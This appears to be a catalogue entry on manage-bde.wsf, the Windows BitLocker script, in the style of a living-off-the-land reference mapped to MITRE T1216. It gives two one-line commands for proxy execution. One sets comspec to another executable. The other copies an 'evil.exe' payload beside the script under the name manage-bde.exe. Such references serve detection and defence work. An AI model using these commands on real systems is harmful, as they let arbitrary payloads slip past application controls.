Manage-bde.wsf

Script for managing BitLocker

Execute

Proxy execution from script

set comspec={PATH_ABSOLUTE:.exe} & cscript c:\windows\system32\manage-bde.wsf

Set the comspec variable to another executable prior to calling manage-bde.wsf for execution. — MITRE: T1216 — Privileges: User

Proxy execution from script

copy c:\users\person\evil.exe c:\users\public\manage-bde.exe & cd c:\users\public\ & cscript.exe c:\windows\system32\manage-bde.wsf

Run the manage-bde.wsf script with a payload named manage-bde.exe in the same directory to run the payload file. — MITRE: T1216 — Privileges: User